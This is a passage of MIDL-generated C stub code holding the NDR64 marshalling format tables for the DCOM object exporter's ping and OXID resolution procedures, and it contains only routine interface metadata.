868 | NDR64_FORMAT_UINT32 869 | __midl_frag1_t; 870 | extern const __midl_frag1_t __midl_frag1; 871 | 872 | static const __midl_frag64_t __midl_frag64 = 873 | 0x13 /* FC64_ERROR_STATUS_T */; 874 | 875 | static const __midl_frag63_t __midl_frag63 = 876 | 0x5 /* FC64_INT32 */; 877 | 878 | static const __midl_frag62_t __midl_frag62 = 879 | { 880 | /* *DWORD */ 881 | 0x20, /* FC64_RP */ 882 | (NDR64_UINT8) 12 /* 0xc */, 883 | (NDR64_UINT16) 0 /* 0x0 */, 884 | &__midl_frag63 885 | }; 886 | 887 | static const __midl_frag61_t __midl_frag61 = 888 | { 889 | /* *DUALSTRINGARRAY */ 890 | 0x21, /* FC64_UP */ 891 | (NDR64_UINT8) 0 /* 0x0 */, 892 | (NDR64_UINT16) 0 /* 0x0 */, 893 | &__midl_frag11 894 | }; 895 | 896 | static const __midl_frag60_t __midl_frag60 = 897 | { 898 | /* **DUALSTRINGARRAY */ 899 | 0x20, /* FC64_RP */ 900 | (NDR64_UINT8) 20 /* 0x14 */, 901 | (NDR64_UINT16) 0 /* 0x0 */, 902 | &__midl_frag61 903 | }; 904 | 905 | static const __midl_frag59_t __midl_frag59 = 906 | { 907 | /* *COMVERSION */ 908 | 0x20, /* FC64_RP */ 909 | (NDR64_UINT8) 4 /* 0x4 */, 910 | (NDR64_UINT16) 0 /* 0x0 */, 911 | &__midl_frag56 912 | }; 913 | 914 | static const __midl_frag58_t __midl_frag58 = 915 | { 916 | /* ServerAlive2 */ 917 | { 918 | /* ServerAlive2 */ /* procedure ServerAlive2 */ 919 | (NDR64_UINT32) 21626944 /* 0x14a0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, HasReturn, ClientCorrelation, HasExtensions */ 920 | (NDR64_UINT32) 40 /* 0x28 */ , /* Stack size */ 921 | (NDR64_UINT32) 0 /* 0x0 */, 922 | (NDR64_UINT32) 84 /* 0x54 */, 923 | (NDR64_UINT16) 1 /* 0x1 */, 924 | (NDR64_UINT16) 0 /* 0x0 */, 925 | (NDR64_UINT16) 4 /* 0x4 */, 926 | (NDR64_UINT16) 8 /* 0x8 */ 927 | }, 928 | { 929 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 930 | { 931 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 932 | 0x72, /* FC64_BIND_PRIMITIVE */ 933 | (NDR64_UINT8) 0 /* 0x0 */, 934 | 0 /* 0x0 */, /* Stack offset */ 935 | (NDR64_UINT8) 0 /* 0x0 */, 936 | (NDR64_UINT8) 0 /* 0x0 */ 937 | }, 938 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 939 | }, 940 | { 941 | /* pComVersion */ /* parameter pComVersion */ 942 | &__midl_frag56, 943 | { 944 | /* pComVersion */ 945 | 0, 946 | 1, 947 | 0, 948 | 0, 949 | 1, 950 | 0, 951 | 0, 952 | 0, 953 | 1, 954 | 0, 955 | 0, 956 | 0, 957 | 0, 958 | (NDR64_UINT16) 0 /* 0x0 */, 959 | 1 960 | }, /* MustFree, [out], SimpleRef, UseCache */ 961 | (NDR64_UINT16) 0 /* 0x0 */, 962 | 8 /* 0x8 */, /* Stack offset */ 963 | }, 964 | { 965 | /* ppdsaOrBindings */ /* parameter ppdsaOrBindings */ 966 | &__midl_frag60, 967 | { 968 | /* ppdsaOrBindings */ 969 | 1, 970 | 1, 971 | 0, 972 | 0, 973 | 1, 974 | 0, 975 | 0, 976 | 0, 977 | 0, 978 | 0, 979 | 0, 980 | 0, 981 | 0, 982 | (NDR64_UINT16) 0 /* 0x0 */, 983 | 1 984 | }, /* MustSize, MustFree, [out], UseCache */ 985 | (NDR64_UINT16) 0 /* 0x0 */, 986 | 16 /* 0x10 */, /* Stack offset */ 987 | }, 988 | { 989 | /* pReserved */ /* parameter pReserved */ 990 | &__midl_frag63, 991 | { 992 | /* pReserved */ 993 | 0, 994 | 0, 995 | 0, 996 | 0, 997 | 1, 998 | 0, 999 | 1, 1000 | 0, 1001 | 1, 1002 | 0, 1003 | 0, 1004 | 0, 1005 | 0, 1006 | (NDR64_UINT16) 0 /* 0x0 */, 1007 | 1 1008 | }, /* [out], Basetype, SimpleRef, UseCache */ 1009 | (NDR64_UINT16) 0 /* 0x0 */, 1010 | 24 /* 0x18 */, /* Stack offset */ 1011 | }, 1012 | { 1013 | /* error_status_t */ /* parameter error_status_t */ 1014 | &__midl_frag64, 1015 | { 1016 | /* error_status_t */ 1017 | 0, 1018 | 0, 1019 | 0, 1020 | 0, 1021 | 1, 1022 | 1, 1023 | 1, 1024 | 1, 1025 | 0, 1026 | 0, 1027 | 0, 1028 | 0, 1029 | 0, 1030 | (NDR64_UINT16) 0 /* 0x0 */, 1031 | 0 1032 | }, /* [out], IsReturn, Basetype, ByValue */ 1033 | (NDR64_UINT16) 0 /* 0x0 */, 1034 | 32 /* 0x20 */, /* Stack offset */ 1035 | } 1036 | }; 1037 | 1038 | static const __midl_frag56_t __midl_frag56 = 1039 | { 1040 | /* COMVERSION */ 1041 | { 1042 | /* COMVERSION */ 1043 | 0x30, /* FC64_STRUCT */ 1044 | (NDR64_UINT8) 1 /* 0x1 */, 1045 | { 1046 | /* COMVERSION */ 1047 | 0, 1048 | 0, 1049 | 0, 1050 | 0, 1051 | 0, 1052 | 0, 1053 | 0, 1054 | 0 1055 | }, 1056 | (NDR64_UINT8) 0 /* 0x0 */, 1057 | (NDR64_UINT32) 4 /* 0x4 */ 1058 | } 1059 | }; 1060 | 1061 | static const __midl_frag52_t __midl_frag52 = 1062 | { 1063 | /* *IID */ 1064 | 0x20, /* FC64_RP */ 1065 | (NDR64_UINT8) 4 /* 0x4 */, 1066 | (NDR64_UINT16) 0 /* 0x0 */, 1067 | &__midl_frag16 1068 | }; 1069 | 1070 | static const __midl_frag49_t __midl_frag49 = 1071 | 0x4 /* FC64_INT16 */; 1072 | 1073 | static const __midl_frag48_t __midl_frag48 = 1074 | { 1075 | /* */ 1076 | (NDR64_UINT32) 1 /* 0x1 */, 1077 | { 1078 | /* struct _NDR64_EXPR_VAR */ 1079 | 0x3, /* FC_EXPR_VAR */ 1080 | 0x3, /* FC64_UINT16 */ 1081 | (NDR64_UINT16) 0 /* 0x0 */, 1082 | (NDR64_UINT32) 16 /* 0x10 */ /* Offset */ 1083 | } 1084 | }; 1085 | 1086 | static const __midl_frag47_t __midl_frag47 = 1087 | { 1088 | /* */ 1089 | { 1090 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1091 | 0x41, /* FC64_CONF_ARRAY */ 1092 | (NDR64_UINT8) 1 /* 0x1 */, 1093 | { 1094 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1095 | 0, 1096 | 0, 1097 | 0, 1098 | 0, 1099 | 0, 1100 | 0, 1101 | 0, 1102 | 0 1103 | }, 1104 | (NDR64_UINT8) 0 /* 0x0 */, 1105 | (NDR64_UINT32) 2 /* 0x2 */, 1106 | &__midl_frag48 1107 | }, 1108 | { 1109 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1110 | (NDR64_UINT32) 2 /* 0x2 */, 1111 | &__midl_frag49 1112 | } 1113 | }; 1114 | 1115 | static const __midl_frag45_t __midl_frag45 = 1116 | 0x7 /* FC64_INT64 */; 1117 | 1118 | static const __midl_frag44_t __midl_frag44 = 1119 | { 1120 | /* *OXID */ 1121 | 0x20, /* FC64_RP */ 1122 | (NDR64_UINT8) 8 /* 0x8 */, 1123 | (NDR64_UINT16) 0 /* 0x0 */, 1124 | &__midl_frag45 1125 | }; 1126 | 1127 | static const __midl_frag43_t __midl_frag43 = 1128 | { 1129 | /* ResolveOxid2 */ 1130 | { 1131 | /* ResolveOxid2 */ /* procedure ResolveOxid2 */ 1132 | (NDR64_UINT32) 23986240 /* 0x16e0040 */, /* explicit handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize, HasReturn, ServerCorrelation, ClientCorrelation, HasExtensions */ 1133 | (NDR64_UINT32) 72 /* 0x48 */ , /* Stack size */ 1134 | (NDR64_UINT32) 46 /* 0x2e */, 1135 | (NDR64_UINT32) 156 /* 0x9c */, 1136 | (NDR64_UINT16) 1 /* 0x1 */, 1137 | (NDR64_UINT16) 0 /* 0x0 */, 1138 | (NDR64_UINT16) 8 /* 0x8 */, 1139 | (NDR64_UINT16) 8 /* 0x8 */ 1140 | }, 1141 | { 1142 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1143 | { 1144 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1145 | 0x72, /* FC64_BIND_PRIMITIVE */ 1146 | (NDR64_UINT8) 0 /* 0x0 */, 1147 | 0 /* 0x0 */, /* Stack offset */ 1148 | (NDR64_UINT8) 0 /* 0x0 */, 1149 | (NDR64_UINT8) 0 /* 0x0 */ 1150 | }, 1151 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1152 | }, 1153 | { 1154 | /* pOxid */ /* parameter pOxid */ 1155 | &__midl_frag45, 1156 | { 1157 | /* pOxid */ 1158 | 0, 1159 | 0, 1160 | 0, 1161 | 1, 1162 | 0, 1163 | 0, 1164 | 1, 1165 | 0, 1166 | 1, 1167 | 0, 1168 | 0, 1169 | 0, 1170 | 0, 1171 | (NDR64_UINT16) 0 /* 0x0 */, 1172 | 0 1173 | }, /* [in], Basetype, SimpleRef */ 1174 | (NDR64_UINT16) 0 /* 0x0 */, 1175 | 8 /* 0x8 */, /* Stack offset */ 1176 | }, 1177 | { 1178 | /* cRequestedProtseqs */ /* parameter cRequestedProtseqs */ 1179 | &__midl_frag49, 1180 | { 1181 | /* cRequestedProtseqs */ 1182 | 0, 1183 | 0, 1184 | 0, 1185 | 1, 1186 | 0, 1187 | 0, 1188 | 1, 1189 | 1, 1190 | 0, 1191 | 0, 1192 | 0, 1193 | 0, 1194 | 0, 1195 | (NDR64_UINT16) 0 /* 0x0 */, 1196 | 0 1197 | }, /* [in], Basetype, ByValue */ 1198 | (NDR64_UINT16) 0 /* 0x0 */, 1199 | 16 /* 0x10 */, /* Stack offset */ 1200 | }, 1201 | { 1202 | /* arRequestedProtseqs */ /* parameter arRequestedProtseqs */ 1203 | &__midl_frag47, 1204 | { 1205 | /* arRequestedProtseqs */ 1206 | 1, 1207 | 1, 1208 | 0, 1209 | 1, 1210 | 0, 1211 | 0, 1212 | 0, 1213 | 0, 1214 | 0, 1215 | 0, 1216 | 0, 1217 | 0, 1218 | 0, 1219 | (NDR64_UINT16) 0 /* 0x0 */, 1220 | 0 1221 | }, /* MustSize, MustFree, [in] */ 1222 | (NDR64_UINT16) 0 /* 0x0 */, 1223 | 24 /* 0x18 */, /* Stack offset */ 1224 | }, 1225 | { 1226 | /* ppdsaOxidBindings */ /* parameter ppdsaOxidBindings */ 1227 | &__midl_frag60, 1228 | { 1229 | /* ppdsaOxidBindings */ 1230 | 1, 1231 | 1, 1232 | 0, 1233 | 0, 1234 | 1, 1235 | 0, 1236 | 0, 1237 | 0, 1238 | 0, 1239 | 0, 1240 | 0, 1241 | 0, 1242 | 0, 1243 | (NDR64_UINT16) 0 /* 0x0 */, 1244 | 1 1245 | }, /* MustSize, MustFree, [out], UseCache */ 1246 | (NDR64_UINT16) 0 /* 0x0 */, 1247 | 32 /* 0x20 */, /* Stack offset */ 1248 | }, 1249 | { 1250 | /* pipidRemUnknown */ /* parameter pipidRemUnknown */ 1251 | &__midl_frag16, 1252 | { 1253 | /* pipidRemUnknown */ 1254 | 0, 1255 | 1, 1256 | 0, 1257 | 0, 1258 | 1, 1259 | 0, 1260 | 0, 1261 | 0, 1262 | 1, 1263 | 0, 1264 | 0, 1265 | 0, 1266 | 0, 1267 | (NDR64_UINT16) 0 /* 0x0 */, 1268 | 1 1269 | }, /* MustFree, [out], SimpleRef, UseCache */ 1270 | (NDR64_UINT16) 0 /* 0x0 */, 1271 | 40 /* 0x28 */, /* Stack offset */ 1272 | }, 1273 | { 1274 | /* pAuthnHint */ /* parameter pAuthnHint */ 1275 | &__midl_frag63, 1276 | { 1277 | /* pAuthnHint */ 1278 | 0, 1279 | 0, 1280 | 0, 1281 | 0, 1282 | 1, 1283 | 0, 1284 | 1, 1285 | 0, 1286 | 1, 1287 | 0, 1288 | 0, 1289 | 0, 1290 | 0, 1291 | (NDR64_UINT16) 0 /* 0x0 */, 1292 | 1 1293 | }, /* [out], Basetype, SimpleRef, UseCache */ 1294 | (NDR64_UINT16) 0 /* 0x0 */, 1295 | 48 /* 0x30 */, /* Stack offset */ 1296 | }, 1297 | { 1298 | /* pComVersion */ /* parameter pComVersion */ 1299 | &__midl_frag56, 1300 | { 1301 | /* pComVersion */ 1302 | 0, 1303 | 1, 1304 | 0, 1305 | 0, 1306 | 1, 1307 | 0, 1308 | 0, 1309 | 0, 1310 | 1, 1311 | 0, 1312 | 0, 1313 | 0, 1314 | 0, 1315 | (NDR64_UINT16) 0 /* 0x0 */, 1316 | 1 1317 | }, /* MustFree, [out], SimpleRef, UseCache */ 1318 | (NDR64_UINT16) 0 /* 0x0 */, 1319 | 56 /* 0x38 */, /* Stack offset */ 1320 | }, 1321 | { 1322 | /* error_status_t */ /* parameter error_status_t */ 1323 | &__midl_frag64, 1324 | { 1325 | /* error_status_t */ 1326 | 0, 1327 | 0, 1328 | 0, 1329 | 0, 1330 | 1, 1331 | 1, 1332 | 1, 1333 | 1, 1334 | 0, 1335 | 0, 1336 | 0, 1337 | 0, 1338 | 0, 1339 | (NDR64_UINT16) 0 /* 0x0 */, 1340 | 0 1341 | }, /* [out], IsReturn, Basetype, ByValue */ 1342 | (NDR64_UINT16) 0 /* 0x0 */, 1343 | 64 /* 0x40 */, /* Stack offset */ 1344 | } 1345 | }; 1346 | 1347 | static const __midl_frag41_t __midl_frag41 = 1348 | { 1349 | /* ServerAlive */ 1350 | { 1351 | /* ServerAlive */ /* procedure ServerAlive */ 1352 | (NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */ 1353 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 1354 | (NDR64_UINT32) 0 /* 0x0 */, 1355 | (NDR64_UINT32) 8 /* 0x8 */, 1356 | (NDR64_UINT16) 1 /* 0x1 */, 1357 | (NDR64_UINT16) 0 /* 0x0 */, 1358 | (NDR64_UINT16) 1 /* 0x1 */, 1359 | (NDR64_UINT16) 8 /* 0x8 */ 1360 | }, 1361 | { 1362 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1363 | { 1364 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1365 | 0x72, /* FC64_BIND_PRIMITIVE */ 1366 | (NDR64_UINT8) 0 /* 0x0 */, 1367 | 0 /* 0x0 */, /* Stack offset */ 1368 | (NDR64_UINT8) 0 /* 0x0 */, 1369 | (NDR64_UINT8) 0 /* 0x0 */ 1370 | }, 1371 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1372 | }, 1373 | { 1374 | /* error_status_t */ /* parameter error_status_t */ 1375 | &__midl_frag64, 1376 | { 1377 | /* error_status_t */ 1378 | 0, 1379 | 0, 1380 | 0, 1381 | 0, 1382 | 1, 1383 | 1, 1384 | 1, 1385 | 1, 1386 | 0, 1387 | 0, 1388 | 0, 1389 | 0, 1390 | 0, 1391 | (NDR64_UINT16) 0 /* 0x0 */, 1392 | 0 1393 | }, /* [out], IsReturn, Basetype, ByValue */ 1394 | (NDR64_UINT16) 0 /* 0x0 */, 1395 | 8 /* 0x8 */, /* Stack offset */ 1396 | } 1397 | }; 1398 | 1399 | static const __midl_frag38_t __midl_frag38 = 1400 | { 1401 | /* *short */ 1402 | 0x20, /* FC64_RP */ 1403 | (NDR64_UINT8) 12 /* 0xc */, 1404 | (NDR64_UINT16) 0 /* 0x0 */, 1405 | &__midl_frag49 1406 | }; 1407 | 1408 | static const __midl_frag36_t __midl_frag36 = 1409 | { 1410 | /* */ 1411 | (NDR64_UINT32) 1 /* 0x1 */, 1412 | { 1413 | /* struct _NDR64_EXPR_VAR */ 1414 | 0x3, /* FC_EXPR_VAR */ 1415 | 0x3, /* FC64_UINT16 */ 1416 | (NDR64_UINT16) 0 /* 0x0 */, 1417 | (NDR64_UINT32) 32 /* 0x20 */ /* Offset */ 1418 | } 1419 | }; 1420 | 1421 | static const __midl_frag35_t __midl_frag35 = 1422 | { 1423 | /* */ 1424 | { 1425 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1426 | 0x41, /* FC64_CONF_ARRAY */ 1427 | (NDR64_UINT8) 7 /* 0x7 */, 1428 | { 1429 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1430 | 0, 1431 | 0, 1432 | 0, 1433 | 0, 1434 | 0, 1435 | 0, 1436 | 0, 1437 | 0 1438 | }, 1439 | (NDR64_UINT8) 0 /* 0x0 */, 1440 | (NDR64_UINT32) 8 /* 0x8 */, 1441 | &__midl_frag36 1442 | }, 1443 | { 1444 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1445 | (NDR64_UINT32) 8 /* 0x8 */, 1446 | &__midl_frag45 1447 | } 1448 | }; 1449 | 1450 | static const __midl_frag34_t __midl_frag34 = 1451 | { 1452 | /* struct _NDR64_POINTER_FORMAT */ 1453 | 0x21, /* FC64_UP */ 1454 | (NDR64_UINT8) 0 /* 0x0 */, 1455 | (NDR64_UINT16) 0 /* 0x0 */, 1456 | &__midl_frag35 1457 | }; 1458 | 1459 | static const __midl_frag32_t __midl_frag32 = 1460 | { 1461 | /* */ 1462 | (NDR64_UINT32) 1 /* 0x1 */, 1463 | { 1464 | /* struct _NDR64_EXPR_VAR */ 1465 | 0x3, /* FC_EXPR_VAR */ 1466 | 0x3, /* FC64_UINT16 */ 1467 | (NDR64_UINT16) 0 /* 0x0 */, 1468 | (NDR64_UINT32) 24 /* 0x18 */ /* Offset */ 1469 | } 1470 | }; 1471 | 1472 | static const __midl_frag31_t __midl_frag31 = 1473 | { 1474 | /* */ 1475 | { 1476 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1477 | 0x41, /* FC64_CONF_ARRAY */ 1478 | (NDR64_UINT8) 7 /* 0x7 */, 1479 | { 1480 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1481 | 0, 1482 | 0, 1483 | 0, 1484 | 0, 1485 | 0, 1486 | 0, 1487 | 0, 1488 | 0 1489 | }, 1490 | (NDR64_UINT8) 0 /* 0x0 */, 1491 | (NDR64_UINT32) 8 /* 0x8 */, 1492 | &__midl_frag32 1493 | }, 1494 | { 1495 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1496 | (NDR64_UINT32) 8 /* 0x8 */, 1497 | &__midl_frag45 1498 | } 1499 | }; 1500 | 1501 | static const __midl_frag30_t __midl_frag30 = 1502 | { 1503 | /* struct _NDR64_POINTER_FORMAT */ 1504 | 0x21, /* FC64_UP */ 1505 | (NDR64_UINT8) 0 /* 0x0 */, 1506 | (NDR64_UINT16) 0 /* 0x0 */, 1507 | &__midl_frag31 1508 | }; 1509 | 1510 | static const __midl_frag24_t __midl_frag24 = 1511 | { 1512 | /* ComplexPing */ 1513 | { 1514 | /* ComplexPing */ /* procedure ComplexPing */ 1515 | (NDR64_UINT32) 19660864 /* 0x12c0040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasReturn, ServerCorrelation, HasExtensions */ 1516 | (NDR64_UINT32) 72 /* 0x48 */ , /* Stack size */ 1517 | (NDR64_UINT32) 58 /* 0x3a */, 1518 | (NDR64_UINT32) 78 /* 0x4e */, 1519 | (NDR64_UINT16) 1 /* 0x1 */, 1520 | (NDR64_UINT16) 0 /* 0x0 */, 1521 | (NDR64_UINT16) 8 /* 0x8 */, 1522 | (NDR64_UINT16) 8 /* 0x8 */ 1523 | }, 1524 | { 1525 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1526 | { 1527 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1528 | 0x72, /* FC64_BIND_PRIMITIVE */ 1529 | (NDR64_UINT8) 0 /* 0x0 */, 1530 | 0 /* 0x0 */, /* Stack offset */ 1531 | (NDR64_UINT8) 0 /* 0x0 */, 1532 | (NDR64_UINT8) 0 /* 0x0 */ 1533 | }, 1534 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1535 | }, 1536 | { 1537 | /* pSetId */ /* parameter pSetId */ 1538 | &__midl_frag45, 1539 | { 1540 | /* pSetId */ 1541 | 0, 1542 | 0, 1543 | 0, 1544 | 1, 1545 | 1, 1546 | 0, 1547 | 1, 1548 | 0, 1549 | 1, 1550 | 0, 1551 | 0, 1552 | 0, 1553 | 0, 1554 | (NDR64_UINT16) 0 /* 0x0 */, 1555 | 0 1556 | }, /* [in], [out], Basetype, SimpleRef */ 1557 | (NDR64_UINT16) 0 /* 0x0 */, 1558 | 8 /* 0x8 */, /* Stack offset */ 1559 | }, 1560 | { 1561 | /* SequenceNum */ /* parameter SequenceNum */ 1562 | &__midl_frag49, 1563 | { 1564 | /* SequenceNum */ 1565 | 0, 1566 | 0, 1567 | 0, 1568 | 1, 1569 | 0, 1570 | 0, 1571 | 1, 1572 | 1, 1573 | 0, 1574 | 0, 1575 | 0, 1576 | 0, 1577 | 0, 1578 | (NDR64_UINT16) 0 /* 0x0 */, 1579 | 0 1580 | }, /* [in], Basetype, ByValue */ 1581 | (NDR64_UINT16) 0 /* 0x0 */, 1582 | 16 /* 0x10 */, /* Stack offset */ 1583 | }, 1584 | { 1585 | /* cAddToSet */ /* parameter cAddToSet */ 1586 | &__midl_frag49, 1587 | { 1588 | /* cAddToSet */ 1589 | 0, 1590 | 0, 1591 | 0, 1592 | 1, 1593 | 0, 1594 | 0, 1595 | 1, 1596 | 1, 1597 | 0, 1598 | 0, 1599 | 0, 1600 | 0, 1601 | 0, 1602 | (NDR64_UINT16) 0 /* 0x0 */, 1603 | 0 1604 | }, /* [in], Basetype, ByValue */ 1605 | (NDR64_UINT16) 0 /* 0x0 */, 1606 | 24 /* 0x18 */, /* Stack offset */ 1607 | }, 1608 | { 1609 | /* cDelFromSet */ /* parameter cDelFromSet */ 1610 | &__midl_frag49, 1611 | { 1612 | /* cDelFromSet */ 1613 | 0, 1614 | 0, 1615 | 0, 1616 | 1, 1617 | 0, 1618 | 0, 1619 | 1, 1620 | 1, 1621 | 0, 1622 | 0, 1623 | 0, 1624 | 0, 1625 | 0, 1626 | (NDR64_UINT16) 0 /* 0x0 */, 1627 | 0 1628 | }, /* [in], Basetype, ByValue */ 1629 | (NDR64_UINT16) 0 /* 0x0 */, 1630 | 32 /* 0x20 */, /* Stack offset */ 1631 | }, 1632 | { 1633 | /* AddToSet */ /* parameter AddToSet */ 1634 | &__midl_frag30, 1635 | { 1636 | /* AddToSet */ 1637 | 1, 1638 | 1, 1639 | 0, 1640 | 1, 1641 | 0, 1642 | 0, 1643 | 0, 1644 | 0, 1645 | 0, 1646 | 0, 1647 | 0, 1648 | 0, 1649 | 0, 1650 | (NDR64_UINT16) 0 /* 0x0 */, 1651 | 0 1652 | }, /* MustSize, MustFree, [in] */ 1653 | (NDR64_UINT16) 0 /* 0x0 */, 1654 | 40 /* 0x28 */, /* Stack offset */ 1655 | }, 1656 | { 1657 | /* DelFromSet */ /* parameter DelFromSet */ 1658 | &__midl_frag34, 1659 | { 1660 | /* DelFromSet */ 1661 | 1, 1662 | 1, 1663 | 0, 1664 | 1, 1665 | 0, 1666 | 0, 1667 | 0, 1668 | 0, 1669 | 0, 1670 | 0, 1671 | 0, 1672 | 0, 1673 | 0, 1674 | (NDR64_UINT16) 0 /* 0x0 */, 1675 | 0 1676 | }, /* MustSize, MustFree, [in] */ 1677 | (NDR64_UINT16) 0 /* 0x0 */, 1678 | 48 /* 0x30 */, /* Stack offset */ 1679 | }, 1680 | { 1681 | /* pPingBackoffFactor */ /* parameter pPingBackoffFactor */ 1682 | &__midl_frag49, 1683 | { 1684 | /* pPingBackoffFactor */ 1685 | 0, 1686 | 0, 1687 | 0, 1688 | 0, 1689 | 1, 1690 | 0, 1691 | 1, 1692 | 0, 1693 | 1, 1694 | 0, 1695 | 0, 1696 | 0, 1697 | 0, 1698 | (NDR64_UINT16) 0 /* 0x0 */, 1699 | 1 1700 | }, /* [out], Basetype, SimpleRef, UseCache */ 1701 | (NDR64_UINT16) 0 /* 0x0 */, 1702 | 56 /* 0x38 */, /* Stack offset */ 1703 | }, 1704 | { 1705 | /* error_status_t */ /* parameter error_status_t */ 1706 | &__midl_frag64, 1707 | { 1708 | /* error_status_t */ 1709 | 0, 1710 | 0, 1711 | 0, 1712 | 0, 1713 | 1, 1714 | 1, 1715 | 1, 1716 | 1, 1717 | 0, 1718 | 0, 1719 | 0, 1720 | 0, 1721 | 0, 1722 | (NDR64_UINT16) 0 /* 0x0 */, 1723 | 0 1724 | }, /* [out], IsReturn, Basetype, ByValue */ 1725 | (NDR64_UINT16) 0 /* 0x0 */, 1726 | 64 /* 0x40 */, /* Stack offset */ 1727 | } 1728 | }; 1729 | 1730 | static const __midl_frag20_t __midl_frag20 = 1731 | { 1732 | /* SimplePing */ 1733 | { 1734 | /* SimplePing */ /* procedure SimplePing */ 1735 | (NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */ 1736 | (NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */ 1737 | (NDR64_UINT32) 40 /* 0x28 */, 1738 | (NDR64_UINT32) 8 /* 0x8 */, 1739 | (NDR64_UINT16) 1 /* 0x1 */, 1740 | (NDR64_UINT16) 0 /* 0x0 */, 1741 | (NDR64_UINT16) 2 /* 0x2 */, 1742 | (NDR64_UINT16) 8 /* 0x8 */ 1743 | }, 1744 | { 1745 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1746 | { 1747 | /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */ 1748 | 0x72, /* FC64_BIND_PRIMITIVE */ 1749 | (NDR64_UINT8) 0 /* 0x0 */, 1750 | 0 /* 0x0 */, /* Stack offset */ 1751 | (NDR64_UINT8) 0 /* 0x0 */, 1752 | (NDR64_UINT8) 0 /* 0x0 */ 1753 | }, 1754 | (NDR64_UINT16) 0 /* 0x0 */ /* Notify index */ 1755 | }, 1756 | { 1757 | /* pSetId */ /* parameter pSetId */ 1758 | &__midl_frag45, 1759 | { 1760 | /* pSetId */ 1761 | 0, 1762 | 0, 1763 | 0, 1764 | 1, 1765 | 0, 1766 | 0, 1767 | 1, 1768 | 0, 1769 | 1, 1770 | 0, 1771 | 0, 1772 | 0, 1773 | 0, 1774 | (NDR64_UINT16) 0 /* 0x0 */, 1775 | 0 1776 | }, /* [in], Basetype, SimpleRef */ 1777 | (NDR64_UINT16) 0 /* 0x0 */, 1778 | 8 /* 0x8 */, /* Stack offset */ 1779 | }, 1780 | { 1781 | /* error_status_t */ /* parameter error_status_t */ 1782 | &__midl_frag64, 1783 | { 1784 | /* error_status_t */ 1785 | 0, 1786 | 0, 1787 | 0, 1788 | 0, 1789 | 1, 1790 | 1, 1791 | 1, 1792 | 1, 1793 | 0, 1794 | 0, 1795 | 0, 1796 | 0, 1797 | 0, 1798 | (NDR64_UINT16) 0 /* 0x0 */, 1799 | 0 1800 | }, /* [out], IsReturn, Basetype, ByValue */ 1801 | (NDR64_UINT16) 0 /* 0x0 */, 1802 | 16 /* 0x10 */, /* Stack offset */ 1803 | } 1804 | }; 1805 | 1806 | static const __midl_frag16_t __midl_frag16 = 1807 | { 1808 | /* IID */ 1809 | { 1810 | /* IID */ 1811 | 0x30, /* FC64_STRUCT */ 1812 | (NDR64_UINT8) 3 /* 0x3 */, 1813 | { 1814 | /* IID */ 1815 | 0, 1816 | 0, 1817 | 0, 1818 | 0, 1819 | 0, 1820 | 0, 1821 | 0, 1822 | 0 1823 | }, 1824 | (NDR64_UINT8) 0 /* 0x0 */, 1825 | (NDR64_UINT32) 16 /* 0x10 */ 1826 | } 1827 | }; 1828 | 1829 | static const __midl_frag13_t __midl_frag13 = 1830 | { 1831 | /* */ 1832 | (NDR64_UINT32) 1 /* 0x1 */, 1833 | { 1834 | /* struct _NDR64_EXPR_VAR */ 1835 | 0x3, /* FC_EXPR_VAR */ 1836 | 0x3, /* FC64_UINT16 */ 1837 | (NDR64_UINT16) 0 /* 0x0 */, 1838 | (NDR64_UINT32) 0 /* 0x0 */ 1839 | } 1840 | }; 1841 | 1842 | static const __midl_frag12_t __midl_frag12 = 1843 | { 1844 | /* */ 1845 | { 1846 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1847 | 0x41, /* FC64_CONF_ARRAY */ 1848 | (NDR64_UINT8) 1 /* 0x1 */, 1849 | { 1850 | /* struct _NDR64_CONF_ARRAY_HEADER_FORMAT */ 1851 | 0, 1852 | 0, 1853 | 0, 1854 | 0, 1855 | 0, 1856 | 0, 1857 | 0, 1858 | 0 1859 | }, 1860 | (NDR64_UINT8) 0 /* 0x0 */, 1861 | (NDR64_UINT32) 2 /* 0x2 */, 1862 | &__midl_frag13 1863 | }, 1864 | { 1865 | /* struct _NDR64_ARRAY_ELEMENT_INFO */ 1866 | (NDR64_UINT32) 2 /* 0x2 */, 1867 | &__midl_frag49 1868 | } 1869 | }; 1870 | 1871 | static const __midl_frag11_t __midl_frag11 = 1872 | { 1873 | /* DUALSTRINGARRAY */ 1874 | { 1875 | /* DUALSTRINGARRAY */ 1876 | 0x32, /* FC64_CONF_STRUCT */ 1877 | (NDR64_UINT8) 1 /* 0x1 */, 1878 | { 1879 | /* DUALSTRINGARRAY */ 1880 | 0, 1881 | 0, 1882 | 1, 1883 | 0, 